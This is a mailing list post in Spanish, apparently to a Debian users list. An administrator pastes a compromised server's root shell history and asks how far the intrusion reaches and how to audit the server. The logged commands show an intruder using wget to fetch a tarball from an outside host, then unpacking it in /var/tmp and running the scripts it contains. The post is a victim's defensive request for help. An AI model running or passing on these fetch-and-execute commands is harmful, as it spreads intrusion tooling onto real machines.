Posible intrusión un server
Lista, buenas tardes.
Perdón si este tema no esta directamente relacionado con Debian, pero
como el server en cuestión tiene Squeeze y es un tema de seguridad creo
que puede interesarles a mas de uno.
Ayer viendo el history de root de un servidor veo lo siguiente:
314 ./go.sh 189
315 w
316 cd
317 cd /var/tmp/
318 rm -rf gosh
319 ls -a
320 exit
321 cat /proc/cpuinfo
322 passwd
323 cd /var/tmp/
324 cd gosh
325 touch bios.txt
326 chmod +x *
327 screen
328 exit
329 cat /proc/cpuinfo
330 cd /var/tmp/
331 ls -a
332 wget http://gblteam.webs.com/gosh.tgz.tar
333 tar zxvf gosh.tgz.tar
334 rm -rf gosh.tgz.tar
335 cd gosh
336 touch bios.txt
337 chmod +x *
338 ./go.sh 200
339 cd
340 cd /var/tmp/
341 ls -a
342 rm -rf gosh
343 ls -a
344 exit
345 cd /var/tmp/
346 perl x.pl
Que opinan?
Entiendo -lamentablemente- que el server fue comprometido, pero lo que
no llego a comprender es el alcance de esto.
Notar que puse el link para que puedan descargarlo uds. también y
analizarlo (tomando las precauciones del caso).
Bueno, si alguien tiene algo de info muy agradecido.
Y si pueden recomendarme algunos pasos para analizar la seguridad del
server desde ya muchas gracias.
Salu2.
Reply to: